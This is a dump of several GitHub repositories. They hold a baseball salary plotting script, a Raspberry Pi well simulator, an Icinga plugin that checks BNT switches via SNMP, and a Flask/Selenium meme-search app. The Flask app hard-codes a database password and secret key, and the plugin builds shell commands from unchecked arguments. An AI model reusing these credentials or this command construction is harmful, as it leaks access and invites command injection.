plt.figure(figsize=(22,15))\nfor (ind, yr) in enumerate(years):\n df = salary_win[salary_win['yearID'] == yr]\n slope, intercept, r_value, p_value, std_err = stats.linregress(df['salary'], df['W'])\n ax = fig.add_subplot(5, 6, ind+1)\n plt.title(\"%d\" % yr)\n ax.scatter(df['salary'], df['W'])\n ax.plot(df['salary'],intercept + slope * df['salary'])\n ax.set_xlabel(\"Total salary\", fontsize=6)\n ax.set_ylabel(\"Win\", fontsize=6)\n ax.set_ylim([40,120])\n plt.annotate(s=\"OAK\", \\\n xy=(df['salary'][df['teamID']=='OAK'], df['W'][df['teamID']=='OAK']), \\\n xytext=(-20, 20),textcoords = 'offset points', ha = 'right', va = 'bottom', \\\n bbox = dict(boxstyle = 'round,pad=0.5', fc = 'yellow', alpha = 0.5), \\\n arrowprops = dict(arrowstyle = '->', connectionstyle = 'arc3,rad=0'))\n\n for (i,t) in enumerate(teams):\n if t in df['teamID'].unique():\n residual[ind,i] = df['W'][df['teamID']==t] - (intercept + slope * df['salary'][df['teamID']==t])\n\n\nteam_res = pd.DataFrame(residual, columns= teams)\nfig2 = plt.figure()\nax = fig2.add_subplot(111)\nax.plot(years, team_res)\nax.set_xlabel(\"Year\")\nax.set_ylabel(\"Residual\")\n\nfig.tight_layout()\nplt.show()\n\n"
}
] | 6 |
Petrolog/RaspberryPIWellSimulator | https://github.com/Petrolog/RaspberryPIWellSimulator | 46626ad5965eb87470e3c5e2d9bece5d62242f3a | 10371ab07598702e73a53f1bd2779389e1a33184 | 74e384681752a9c73a1ce0e3241038302d89a35e | refs/heads/master | 2016-06-07T17:30:20.861569 | 2016-04-13T00:58:28 | 2016-04-13T00:58:28 | 14,973,000 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.4762752056121826,
"alphanum_fraction": 0.49822065234184265,
"avg_line_length": 23.100000381469727,
"blob_id": "882acf3c395041b549412dff67de187a48fec05e",
"content_id": "f7252c1d81bcaaa3fecaa66dd2faa7d058f64847",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1686,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 70,
"path": "/Utils/G4Test.py",
"repo_name": "Petrolog/RaspberryPIWellSimulator",
"src_encoding": "UTF-8",
"text": "__author__ = 'Cesar'\n\n#-------------------------------------------------------------------------------\n# Name: G4Test\n# Purpose:\n#\n# Author: Cesar\n#\n# Created: 07/08/2013\n# Copyright: (c) Cesar 2013\n# Licence: <your licence>\n#-------------------------------------------------------------------------------\n\nimport time\nimport serial\nimport threading\n\nmessageToSend = 'E'\ntenSec = 0\nRx = True\nerrorCounter = 0\n\ndef SendCommand():\n global tenSec, Rx, messageToSend, errorCounter\n\n print(\"TxST: SendCommand Thread Running ...\")\n port.flushOutput()\n\n\n while True:\n if messageToSend == 'E':\n command = \"01E\\x0D\"\n Rx = True\n elif messageToSend == 'MB':\n command = \"01MB\\x0D\"\n Rx = True\n elif messageToSend == 'S?1':\n command = \"01S?1\\x0D\"\n Rx = True\n\n data_toPrint = command[:-1]\n print(\"[{}]TxST: Tx Data->[{}]\".format(time.clock(), data_toPrint))\n port.write(command)\n while Rx:\n try:\n MessageFromSerial = port.readline()\n # Remove last 3 chars (CR LF)\n data_toPrint = MessageFromSerial[:-2]\n print(\"[{}]RxST: Rx Data->[{}]\".format(time.clock(), data_toPrint))\n Rx = False\n\n except serial.SerialException as e:\n print(\"Error: ...\"+e)\n\n except IndexError as i:\n print(\"Error: ...\"+i)\n\n\n\n\nglobal port\n\nport = serial.Serial(\"/dev/ttyAMA0\", baudrate=19200, timeout=1)\n\nSerialRxThread = threading.Thread(target=SendCommand)\nSerialRxThread.daemon = True\nSerialRxThread.start()\n\nwhile True:\n a=0 #Do nothing"
},
{
"alpha_fraction": 0.5372119545936584,
"alphanum_fraction": 0.5508122444152832,
"avg_line_length": 27.17021369934082,
"blob_id": "d20d8b205cb8dc9db837c071f442fd8532206c5e",
"content_id": "e2e82306fb378f44ce5d22ea46a503681841119c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2647,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 94,
"path": "/simulator.py",
"repo_name": "Petrolog/RaspberryPIWellSimulator",
"src_encoding": "UTF-8",
"text": "__author__ = 'Cesar'\n\n\nimport readDyna\nimport time\nimport logging\nimport threading\nimport piplates.DAQCplate as io\n\n\ndef generate_load_and_position():\n \"\"\"\n Gets data from readyDyna and generates a (load, position) pair every 80ms\n \"\"\"\n logging.info(\"generate_load_and_position: Thread Running ...\")\n while True:\n for point in readDyna.dyna:\n if running:\n time.sleep(.1)\n load = float(point[0])/1000\n position = float(point[1])/1000\n logging.debug(\"generate_load_and_position: load(V) = [{0}], position = [{1}]\"\n .format(load, position))\n io.setDAC(0, 0, load)\n io.setDAC(0, 1, position)\n else:\n logging.debug(\"generate_load_and_position: Stopped\")\n break\n\n\ndef blink_leds():\n \"\"\"\n Blink a pattern in DAQC LEDs to show work is being done\n \"\"\"\n logging.info(\"blink_leds: Thread Running ...\")\n count = 1\n direction = 'up'\n while True:\n time.sleep(.1)\n if running:\n logging.debug(\"blink_leds: count = [{0}], direction = [{1}]\".format(count, direction))\n io.setDOUTall(0, count)\n if count <= 1:\n direction = 'up'\n elif count >= 255:\n direction = 'down'\n if direction == 'up':\n logging.debug(\"going UP\")\n count <<= 1\n elif direction == 'down':\n logging.debug(\"going DOWN\")\n count >>= 1\n else:\n io.setDOUTall(0, count)\n logging.debug(\"blink_leds: Stopped\")\n\n\ndef get_well_state():\n \"\"\"\n Get the status of the output connected to the run POC terminal\n \"\"\"\n global running\n logging.info(\"get_well_state: Thread Running ...\")\n while True:\n time.sleep(.5)\n well_on = io.getDINbit(0, 0)\n if well_on == 0:\n running = True\n logging.debug(\"get_well_state: Well State = Running\")\n else:\n running = False\n logging.debug(\"get_well_state: Well State = Stopped\")\n\n# Logging\nlogging.basicConfig(format='%(asctime)s - [%(levelname)s]: %(message)s',\n filename='/home/logs/simulator.log',\n level=logging.INFO)\n\nrunning = False\n\ngenerate = threading.Thread(target=generate_load_and_position)\ngenerate.daemon = True\ngenerate.start()\n\nblink = threading.Thread(target=blink_leds)\nblink.daemon = True\nblink.start()\n\nstate = threading.Thread(target=get_well_state)\nstate.daemon = True\nstate.start()\n\nwhile True:\n a = 0 # Do nothing"
}
] | 2 |
linhc130/icinga-plugins-check-bnt-switch | https://github.com/linhc130/icinga-plugins-check-bnt-switch | 57f2bc76e22052e729d8cfe051cec4d7ad16c171 | 9a4c09280d22c6730850a19e0cf2d6a80fc1dfe3 | 15661a612e22b1fdad9fb8e209757ad7bbd6e4ef | refs/heads/master | 2021-01-12T13:06:27.505739 | 2016-10-07T09:47:55 | 2016-10-07T09:47:55 | 70,116,442 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7114882469177246,
"alphanum_fraction": 0.7637075781822205,
"avg_line_length": 27.370370864868164,
"blob_id": "2d38a782fcb863a2cf5f061887990314aa050b8f",
"content_id": "82a8eddc4431b40be535ddd1d29312c6bdc190be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 766,
"license_type": "no_license",
"max_line_length": 250,
"num_lines": 27,
"path": "/README.md",
"repo_name": "linhc130/icinga-plugins-check-bnt-switch",
"src_encoding": "UTF-8",
"text": "# icinga-plugins-check-bnt-switch\n\nThis plugin checks (IBM, Lenovo) BNT G8052 G8264 switches, including\n\n- CPU with warning and critical value\n- Fans (RPM)\n- Temperature\n- Power supply status\n- Global Health (G8264)\n- SNMP\n\n\n\nWorked with icinga 1.8.\n\nShould be work with icinga 1.x / nagios\n\n\n**IMPORTANT**: \n## Requirements : python 3.x\n\nAttentions for install python 3.x on CentOS 6. Please do google how-to install python 3 on CentOS 6 and install python 3.x on separate dir other than OS default python dir to ensure 'yum' and other system scripts which based on python 2.6.x scripts.\n\n\nReference from [G8052/G8264 monitoring plugin](https://exchange.nagios.org/directory/Plugins/Hardware/Network-Gear/Others/G8052-2FG8264-monitoring-plugin/details)\n\nby Stephen HC Lin\n"
},
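For reference, a minimal invocation sketch for the plugin whose source follows (the host address and community string are placeholders; the operation names and the -H/-C/-w/-c flags come from the script's argument parser, and -w/-c are only required for the CPU check):

```python
import subprocess

# Placeholder target switch and SNMP community string
status = subprocess.getoutput("./check_bnt_switch CPU -H 192.0.2.10 -C public -w 80 -c 90")
print(status)  # e.g. "OK: CPU utilization is ok"
```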
{
"alpha_fraction": 0.5198525190353394,
"alphanum_fraction": 0.590076744556427,
"avg_line_length": 35.05010986328125,
"blob_id": "eab5b3ef0cdd5e4ff4dfbffcc51d1e7fb00fc7ad",
"content_id": "920ef2ec22c77bb854dc3a83062c2a707aa6123b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 16547,
"license_type": "no_license",
"max_line_length": 298,
"num_lines": 459,
"path": "/check_bnt_switch",
"repo_name": "linhc130/icinga-plugins-check-bnt-switch",
"src_encoding": "UTF-8",
"text": "#!/usr/local/bin/python3.4\n# Copyright (c) 2015, 2016 IBM Corp.\n#\n# This module is free software; you can redistribute\n# it and/or modify it under the terms of GNU General Public\n# License (GPL) version 2.\n# Reference : https://exchange.nagios.org/directory/Plugins/Hardware/Network-Gear/Others/G8052-2FG8264-monitoring-plugin/details\n#\n# Fixed Bug 1 : CPU warning with int to str\n# Fixed Bug 2 : Modified fan_rpm to accept o RPM which indicates not install\n# Rewrite 1 : Temperature\n# Rewrite 2 : Fan\n# Remove 1 : G8052 Global_health due to inaccuracy of non-installed fans\n#\n# Modified by Stephen HC Lin\n\nimport logging\nimport argparse\nimport subprocess\nimport re\n\nCHECK_SNMP_CMD=\"/usr/local/icinga/libexec/check_snmp \"\n# Orignal\nTEMPERATURE_OID1=\".1.3.6.1.4.1.26543.100.100.14.11.0\"\nTEMPERATURE_OID2=\".1.3.6.1.4.1.26543.100.100.14.12.0\"\nTEMPERATURE_OID3=\".1.3.6.1.4.1.26543.100.100.14.13.0\"\nTEMPERATURE_OID4=\".1.3.6.1.4.1.26543.100.100.14.32.0\"\n\nFAN_OID1=\".1.3.6.1.4.1.26543.100.100.14.14.0\"\nFAN_OID2=\".1.3.6.1.4.1.26543.100.100.14.15.0\"\nFAN_OID3=\".1.3.6.1.4.1.26543.100.100.14.16.0\"\nFAN_OID4=\".1.3.6.1.4.1.26543.100.100.14.17.0\"\nFAN_OID5=\".1.3.6.1.4.1.26543.100.100.14.18.0\"\nFAN_OID6=\".1.3.6.1.4.1.26543.100.100.14.27.0\"\nFAN_OID7=\".1.3.6.1.4.1.26543.100.100.14.40.0\"\nFAN_OID8=\".1.3.6.1.4.1.26543.100.100.14.41.0\"\n\n# Temperature OID\n# 8264 - 5 Sensors; Warning at 75 C and Recover at 90 C\n# 8052 - 11 Sensors\n#TEMPERATURE_OID=\".1.3.6.1.4.1.26543.2.7.7.1.3.1.14.0\"\nG8052_TEMPERATURE_OID=\".1.3.6.1.4.1.26543.2.7.7.1.3.1.14.0\"\nG8264_TEMPERATURE_OID=\".1.3.6.1.4.1.26543.2.7.6.1.3.1.14.0\"\n\n# FAN OID\n# 8264 - 8 Fans; But Fan 1 and 2 are 0 RPM due to non installed.\n# 8052 - 8 Fans\n#FAN_OID=\".1.3.6.1.4.1.26543.2.7.7.1.3.1.13.0\"\nG8052_FAN_OID=\".1.3.6.1.4.1.26543.2.7.7.1.3.1.13.0\"\nG8264_FAN_OID=\".1.3.6.1.4.1.26543.2.7.6.1.3.1.13.0\"\n\nPOWER_OID1=\".1.3.6.1.4.1.26543.100.100.14.20.0\"\nPOWER_OID2=\".1.3.6.1.4.1.26543.100.100.14.21.0\"\nSYS_OID=\".1.3.6.1.2.1.1.3.0\"\nG8264_CPU_64_SEC_OID=\".1.3.6.1.4.1.26543.2.7.6.1.2.2.3.0\"\nG8052_CPU_64_SEC_OID=\".1.3.6.1.4.1.26543.2.7.7.1.2.2.3.0\"\nG8264_GLOBAL_HEALTH_OID=\".1.3.6.1.4.1.26543.2.7.6.1.3.1.15.0\"\nG8052_GLOBAL_HEALTH_OID=\".1.3.6.1.4.1.26543.2.7.7.1.3.1.15.0\"\n\nG8052_MODEL=\"G8052\"\nG8264_MODEL=\"G8264\"\n\ndef find_model_of_device(ip_address):\n \"\"\"\n Find the Model of the IBM switch so that corresponding OIDs can be sent for query\n \"\"\"\n _METHOD_ =\"check_bnt_switch.find_model_of_device\"\n\n #Try to use snmpget to determine device\n output = subprocess.check_output([\"snmpget\",\"-v2c\",\"-c\",community,address,\"sysDescr.0\"],stderr=subprocess.DEVNULL)\n output = output.decode()\n if G8052_MODEL in output:\n return G8052_MODEL\n elif G8264_MODEL in output:\n return G8264_MODEL\n else:\n return \"Unknown: Unsupported Model\"\n\ndef check_snmp_status():\n \"\"\"\n Checking the snmp status of the switch\n \"\"\"\n _METHOD_ =\"check_bnt_switch.check_snmp_status\"\n\n cmd = CHECK_SNMP_CMD + \"-H \" + address + \" -C \" + community + \" -o \" + SYS_OID\n output = subprocess.getoutput(cmd)\n\n if (\"SNMP OK\" in output):\n rc = 0\n msg = \"OK: SNMP Status is OK\"\n else:\n rc = 2\n msg = \"Warning: SNMP Status is down\"\n\n return (rc, msg)\n\ndef check_cpu_status(warning, critical):\n \"\"\"\n Checking the cpu status of the switch\n \"\"\"\n _METHOD_ =\"check_bnt_switch.check_cpu_status\"\n\n if (model == G8052_MODEL):\n cpu_oid = G8052_CPU_64_SEC_OID\n elif (model == 
G8264_MODEL):\n cpu_oid = G8264_CPU_64_SEC_OID\n else:\n msg = \"Unknown: CPU Utilization is unknown - Unsupported Model\"\n rc = 3\n return (rc, msg)\n\n cmd = CHECK_SNMP_CMD + \"-H \" + address + \" -C \" + community + \" -o \" + cpu_oid\n output = subprocess.getoutput(cmd)\n value = output.split()[3].strip('\"')\n\n cpu_util=float(value)\n\n # OK:\n # -All Power modules are on\n # Critical:\n # -One or more Power modules are off or absent\n\n if (cpu_util > critical) :\n msg = \"Critical: High CPU utilization over \" + str(critical) +\"%\"\n rc = 2\n elif (cpu_util > warning):\n msg = \"Warning: CPU utiliziation over \" + str(warning) + \"%\"\n rc = 1\n elif (cpu_util <= warning):\n msg = \"OK: CPU utilization is ok\"\n rc = 0\n else:\n msg = \"Unknown: CPU utilization unknown\"\n rc = 3\n\n return (rc, msg)\n\ndef check_fan_status():\n \"\"\"\n Checking the fan status of the switch\n \"\"\"\n _METHOD_ =\"check_bnt_switch.check_fan_status\"\n if (model == G8052_MODEL):\n FAN_OID = G8052_FAN_OID\n elif (model == G8264_MODEL):\n FAN_OID = G8264_FAN_OID\n else:\n msg = \"Unknown: Fan status is unknown - Unsupported Model\"\n rc = 3\n return (rc, msg)\n\n try :\n cmd = CHECK_SNMP_CMD + \"-H \" + address + \" -C \" + community + \" -o \" + FAN_OID\n output = subprocess.getoutput(cmd)\n # Sample output = SNMP OK - \"Fan 1: 0 RPM (25 PWM); Fan 2: 0 RPM (25 PWM); Fan 3: 8372 RPM (25 PWM); Fan 4: 3898 RPM (25 PWM); Fan 5: 7792 RPM (25 PWM); Fan 6: 3341 RPM (25 PWM); Fan 7: 8626 RPM (25 PWM); Fan 8: 3840 RPM (25 PWM); \" |\n\n value = output.split('\"')[1].strip()\n allFans = re.findall(r'\\d+ RPM',value)\n\n fans = []\n for i in range(8):\n fans.append(int(re.sub(r' RPM','',allFans[i])))\n\n # OK:\n # -All Fans are OK\n # Critical:\n # -One or more Fans re running less than 100 RPM\n\n for fan_rpm in fans:\n if fan_rpm > 0 and fan_rpm < 100:\n msg = \"Critical: Fans status is critical \\n -One or more fans are running < 100 RPM\"+\";\"+value\n rc = 2\n return (rc, msg)\n\n msg = \"OK: Fan Status is ok\"+\";\"+value\n rc = 0\n\n except Exception as e:\n rc = 3\n msg = \"Unknown: Fan status is unknown\"\n\n return (rc, msg)\n\ndef check_power_status():\n \"\"\"\n Checking the power status of the switch\n \"\"\"\n _METHOD_ =\"check_bnt_switch.check_power_status\"\n\n cmd = CHECK_SNMP_CMD + \"-H \" + address + \" -C \" + community + \" -o \" + POWER_OID1 + \" -o \" + POWER_OID2\n output = subprocess.getoutput(cmd)\n value = output.split('-')[1].strip()\n allPowers = value.split()\n power1= int(allPowers[0].strip('\"'))\n power2= int(allPowers[1].strip('\"'))\n\n # OK:\n # -All Power modules are on\n # Critical:\n # -One or more Power modules are off or absent\n\n if (power1 == 1 and power2 == 1) :\n msg = \"OK: All Power modules are On\"\n rc = 0\n elif (power1 == 0 or power1 == 2 or power2 == 0 or power2 == 2):\n msg = \"Critical: One or more Power modules are off or absent\"\n rc = 2\n else:\n msg = \"Unknown: Power status unknown\"\n rc = 3\n\n return (rc, msg)\n\ndef check_g8052_temperature_status():\n # Rewrote by Stephen with an OID which contains all temperatures\n\n # Define Warning and Critical value by reference system output\n # Reference : SNMPv2-SMI::enterprises.26543.2.7.7.1.3.1.12.0 = STRING: \"Fans are in Back-To-Front AirFlow, Warning at 55 C and Recover at 80 C for sensor 1,2; Warning at 95 C and Recover at 120 C for sensor 6-11\n # Critical:\n # -Any of temperature sensor 1,2 is in the failure range (eg. > 80 C);\n # -Any of temperature sensors 6-11 is in the failure range (eg. 
> 120 C);\n # Warning:\n # -Any of temperature sensor 1,2 is in the warning threshold (eg. > 55 C);\n # -Any of temperature sensors 6-11 is in the warning threshold (eg. > 95 C);\n # OK:\n # -temperature sensor 1,2 are below the warning threshold (eg. < 55 C);\n # -temperature sensor 6-11 are below the warning threshold (eg. < 95 C);\n sysCritical=80.0\n phyCritical=120.0\n sysWarning=55.0\n phyWarning=95.0\n \n try :\n cmd = CHECK_SNMP_CMD + \"-H \" + address + \" -C \" + community + \" -o \" + G8052_TEMPERATURE_OID\n output = subprocess.getoutput(cmd)\n # Sample output = 'SNMP OK - \"Sensor 1: 28.0; Sensor 2: 31.5; Sensor 3: 30.50; Sensor 4: 48.00; Sensor 5: 47.25; Sensor 6: 56.0; Sensor 7: 52.0; Sensor 8: 63.0; Sensor 9: 49.0; Sensor 10: 49.0; Sensor 11: 56.0; \" |'\n\n value = output.split('\"')[1].strip()\n allTemps = re.findall(r'\\d+.\\d+',value)\n #allTemps = re.findall(r'[-+]?\\d*\\.\\d+|\\d+',value)\n\n temps = []\n for i in range(11):\n temps.append(float(allTemps[i]))\n #temps.append(float(re.sub(r';','',temp)))\n\n # Critical:\n # -Any of temperature sensor 1,2 is in the failure range (eg. > 80 C);\n # -Any of temperature sensors 6-11 is in the failure range (eg. > 120 C);\n # Warning:\n # -Any of temperature sensor 1,2 is in the warning threshold (eg. > 55 C);\n # -Any of temperature sensors 6-11 is in the warning threshold (eg. > 95 C);\n # OK:\n # -temperature sensor 1,2 are below the warning threshold (eg. < 55 C);\n # -temperature sensor 6-11 are below the warning threshold (eg. < 95 C);\n \n rc = 0\n msg = \"OK: Temperature status is ok;\"+value\n \n # Check Critical \n for i in range(0, 2):\n if temps[i] >= sysCritical:\n msg = \"Critical: Temparature is critical;\"+str(temps[i])+\";\"+value\n rc = 2\n return (rc, msg)\n \n for i in range(5, 11):\n if temps[i] >= phyCritical:\n msg = \"Critical: Temparature is critical;\"+str(temps[i])+\";\"+value\n rc = 2\n return (rc, msg)\n \n # Check Warning \n for i in range(0, 2):\n if temps[i] >= sysWarning:\n msg = \"Warning: Temparature status is warning;\"+str(temps[i])+\";\"+value\n rc = 1\n return (rc, msg)\n \n for i in range(5, 11):\n if temps[i] >= phyWarning:\n msg = \"Warning: Temparature status is warning;\"+str(temps[i])+\";\"+value\n rc = 1\n return (rc, msg)\n\n except Exception as e:\n rc = 3\n msg = \"Unknown: Temperature status is unknown\"\n\n return (rc, msg)\n\ndef check_g8264_temperature_status():\n # Rewrote by Stephen with an OID which contains all temperatures\n\n # Define Warning and Critical value by reference system output\n # Reference : ./check_snmp -H 172.16.164.230 -C cdltpitteam2hs4rre -o\".1.3.6.1.4.1.26543.2.7.6.1.3.1.12.0\" | P OK - Fans are in Back-To-Front AirFlow, Warning at 75 C and Recover at 90 C.1.3.6.1.4.1.26543.2.7.6.1.3.1.12.0:\"Fans are in Back-To-Front AirFlow, Warning at 75 C and Recover at 90 C\"\n # Critical:\n # -Any of temperature sensors is in the failure range (eg. > 90 C);\n # Warning:\n # -Any of temperature sensors is in the warning threshold (eg. > 75 C);\n # OK:\n # -all temperature sensors are below the warning threshold (eg. 
< 75 C);\n\n sysCritical=90.0\n sysWarning=75.0\n \n try :\n cmd = CHECK_SNMP_CMD + \"-H \" + address + \" -C \" + community + \" -o \" + G8264_TEMPERATURE_OID\n output = subprocess.getoutput(cmd)\n # Sample output = 'SNMP OK - \"Sensor 1: 38.0; Sensor 2: 24.0; Sensor 3: 34.5; Sensor 4: 20.5; Sensor 5: 43; \" |'\n\n value = output.split('\"')[1].strip()\n allTemps = re.findall(r'[-+]?\\d*\\.\\d+|\\d+',value)\n\n temps = []\n for temp in allTemps:\n temps.append(float(re.sub(r';','',temp)))\n\n # Critical:\n # -Any of temperature sensors is in the failure range (eg. > 90 C);\n # Warning:\n # -Any of temperature sensors is in the warning threshold (eg. > 75 C);\n # OK:\n # -all temperature sensors are below the warning threshold (eg. < 75 C);\n\n rc = 0\n msg = \"OK: Temperature status is ok;\"+value\n\n # Check Temperature Critical threshold\n for temp in temps:\n if temp >= sysCritical:\n msg = \"Critical: Temparature is critical;\"+str(temp)+\";\"+value\n rc = 2\n return (rc, msg)\n\n # Check Temperature Warning threshold\n for temp in temps:\n if temp >= sysWarning:\n msg = \"Warning: Temparature status is warning;\"+str(temp)+\";\"+value\n rc = 1\n return (rc, msg)\n\n except Exception as e:\n rc = 3\n msg = \"Unknown: Temperature status is unknown\"\n\n return (rc, msg)\n\ndef check_temperature_status():\n \"\"\"\n Checking the temperature status of the switch - Rewrote by Stephen separate check funtions of G8052 and G8264\n \"\"\"\n _METHOD_ =\"check_bnt_switch.check_temperature_status\"\n if (model == G8052_MODEL):\n (rc,msg) = check_g8052_temperature_status()\n return (rc, msg)\n elif (model == G8264_MODEL):\n (rc,msg) = check_g8264_temperature_status()\n return (rc, msg)\n else:\n msg = \"Unknown: Temperature Utilization is unknown - Unsupported Model\"\n rc = 3\n return (rc, msg)\n\ndef check_global_health():\n \"\"\"\n Checking the global status of the switch. This method uses OID - modified by Stephen\n \"\"\"\n _METHOD_ =\"check_bnt_switch.check_global_health\"\n\n if (model == G8052_MODEL):\n #global_health_oid = G8052_GLOBAL_HEALTH_OID\n # Through field tests, G8052 may report critical caused by first 2 Fans are not installed.\n msg = \"Unknown: Global Health Status is not accurate at G8052\"\n rc = 3\n return (rc, msg)\n elif (model == G8264_MODEL):\n global_health_oid = G8264_GLOBAL_HEALTH_OID\n else:\n msg = \"Unknown: Global Health Status is unknown\"\n rc = 3\n return (rc, msg)\n\n cmd = CHECK_SNMP_CMD + \"-H \" + address + \" -C \" + community + \" -o \" + global_health_oid\n output = subprocess.getoutput(cmd)\n value = output.split('=')[1].strip()\n\n # OK:\n # -All temperature sensors are below the warning threshold (eg. < 85 C);\n # -All fans are running at >=100 RPMs;\n # -Both power supplies are on;\n # -No panic dump exists in flash.\n # Warning:\n # -One or more temperature sensors is in the warning range (eg. >=85 and < 100 C);\n # -A panic dump exists in flash.\n # Critical:\n # -One or more temperature sensors is in the failure range (eg. 
>=100 C);\n # -One or more fans are running < 100 RPM;\n # -One power supply is off.\n\n if (value == '1'):\n msg = \"OK: Global Health Status is OK \\n -All temperature sensors are below the warning threshold \\n -All fans are running at >=100 RPMs \\n -Both power supplies are on \\n -No panic dump exists in flash\"\n rc = 0\n elif (value == '2'):\n msg = \"Warning: Global Health Status is non-critical \\nwhich means one of the following:\\n -One or more temperature sensors is in the warning range \\n -A panic dump exists in flash\"\n rc = 1\n elif (value == '3'):\n msg = \"Critical: Global Health Status is critical \\nwhich means one of the following:\\n -One or more temperature sensors is in the failure range \\n -One or more fans are running < 100 RPM \\n -One power supply is off\"\n rc = 2\n else:\n msg = \"Unknown: Global Health Status is unknown\"\n rc = 3\n\n return (rc, msg)\n\nif __name__ == '__main__':\n\n CMD = \"check_bnt_switch\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\"operation\")\n parser.add_argument('-H', '--Host', required=True)\n parser.add_argument('-C', '--Community', required=True)\n parser.add_argument('-c', '--critical', required=False, type=int)\n parser.add_argument('-w', '--warning', required=False, type=int)\n args = parser.parse_args()\n operation = args.operation\n address = args.Host\n warning = args.warning\n critical = args.critical\n community = args.Community\n\n model = find_model_of_device(address)\n\n if (operation == \"CPU\"):\n if (warning == None or critical == None):\n rc = 3\n msg = \"Warning or Critical levels missing\"\n print (msg)\n exit(rc)\n\n if operation == \"GLOBAL_HEALTH\":\n (rc,msg) = check_global_health()\n elif operation == \"TEMPERATURE\":\n # Remove threshold setting - 8052 has 2 thresholds on sensors\n (rc,msg) = check_temperature_status()\n elif operation == \"FAN\":\n (rc,msg) = check_fan_status()\n elif operation == \"POWER\":\n (rc,msg) = check_power_status()\n elif operation == \"SNMP\":\n (rc,msg) = check_snmp_status()\n elif operation == \"CPU\":\n (rc,msg) = check_cpu_status(warning, critical)\n else:\n msg = \"Unknown operation: \" + operation\n rc = 3\n\n print(msg)\n exit(rc)\n"
}
] | 2 |
AdamD-967/RandMem | https://github.com/AdamD-967/RandMem | 7e31a3b9a2e1f51cb598f29fc60ff1bd8741fe00 | 4d57fb8d2886eb960124ad97cc50025f770af2d0 | 42808b250eb72393deb36d9d742b8c9fd496a1b1 | refs/heads/master | 2022-09-05T23:05:27.627338 | 2020-05-29T12:37:08 | 2020-05-29T12:37:08 | 260,928,338 | 0 | 0 | null | 2020-05-03T13:35:29 | 2020-05-25T13:07:54 | 2020-05-25T13:07:52 | Python | [
{
"alpha_fraction": 0.6214135885238647,
"alphanum_fraction": 0.6312106251716614,
"avg_line_length": 29.404254913330078,
"blob_id": "040b67367730cecb338d9e5b89bcce15733fdf6e",
"content_id": "e7f479c166143de9f7fb56ac52ae4cb894875722",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1429,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 47,
"path": "/app.py",
"repo_name": "AdamD-967/RandMem",
"src_encoding": "UTF-8",
"text": "from flask import Flask, render_template, request, redirect, url_for, session\nfrom getitem import getitem\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\napp.secret_key = \"w^dr8@O4IiR7\"\napp.config['SQLALCHEMY_DATABASE_URL'] = \"postgres://etrdaefwshxfkb:16d8d6f38f1b3021b4c5b833cb2e2d4407d2ec91acb560174386c9782867c6d4@ec2-52-86-73-86.compute-1.amazonaws.com:5432/dada9tvecoeq0h\"\n\ndb = SQLAlchemy(app)\n\nclass DataBass(db.Model):\n _id = db.Column(db.Integer, primary_key=True)\n runtime = db.Column(db.Integer)\n keyword = db.Column(db.String())\n \n def __init__(self, runtime, keyword):\n self.runtime = runtime\n self.keyword = keyword\n\ndef getApp():\n return app\n\[email protected](\"/\", methods=[\"GET\", \"POST\"])\[email protected](\"/start\", methods=[\"GET\", \"POST\"])\ndef start():\n if request.method == \"POST\":\n session[\"keyword\"] = request.form[\"keyword\"]\n return redirect(url_for(\"output\"))\n else:\n return render_template(\"main.html\")\n\[email protected](\"/output\")\ndef output():\n if \"keyword\" in session:\n img = getitem(session[\"keyword\"])[0]\n runtime = getitem(session[\"keyword\"])[1]\n data = DataBass(runtime, session[\"keyword\"].lower())\n db.session.add(data)\n db.session.commit()\n session.pop(\"keyword\")\n return render_template(\"output.html\", img=img, runtime=runtime)\n else:\n return 'no keyword, go to <a href=\"/start\">start</a>'\n\nif __name__ == \"__main__\":\n db.create_all()\n app.run(debug=True)\n"
},
{
"alpha_fraction": 0.6785714030265808,
"alphanum_fraction": 0.6920995712280273,
"avg_line_length": 41.97674560546875,
"blob_id": "093f378399c91a9b44bca953843da9acd017304c",
"content_id": "e6201b01bb78b3b4e2a72255d0cc6d338399190a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1848,
"license_type": "no_license",
"max_line_length": 152,
"num_lines": 43,
"path": "/getitem.py",
"repo_name": "AdamD-967/RandMem",
"src_encoding": "UTF-8",
"text": "from selenium.webdriver import Chrome\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom time import sleep, time\nfrom random import choice\nimport os\nfrom webdriver_manager.chrome import ChromeDriverManager\n\ndef getitem(name):\n ts = time()\n opts = Options()\n opts.binary_location = os.environ.get(\"GOOGLE_CHROME_BIN\")\n opts.add_argument(\"--headless\")\n opts.add_argument(\"--disable-dev-shm-usage\")\n opts.add_argument(\"--no-sandbox\")\n driver = Chrome(ChromeDriverManager().install(), options=opts)\n\n driver.get(\"https://www.bing.com/\")\n\n WebDriverWait(driver, 25).until(EC.presence_of_element_located((By.XPATH, r\"/html/body/div[3]/div[2]/div[2]/form/input[1]\")))\n search = driver.find_element_by_xpath(r\"/html/body/div[3]/div[2]/div[2]/form/input[1]\")\n search.send_keys(name+\" meme\")\n search.submit()\n\n WebDriverWait(driver, 25).until(EC.presence_of_element_located((By.XPATH, r\"/html/body/header/nav/ul/li[2]/a\")))\n driver.find_element_by_xpath(r\"/html/body/header/nav/ul/li[2]/a\").click()\n sleep(2)\n \n h = driver.execute_script(\"return document.body.scrollHeight\")\n while True:\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n sleep(2)\n nh = driver.execute_script(\"return document.body.scrollHeight\")\n if nh == h:\n break\n h = nh\n 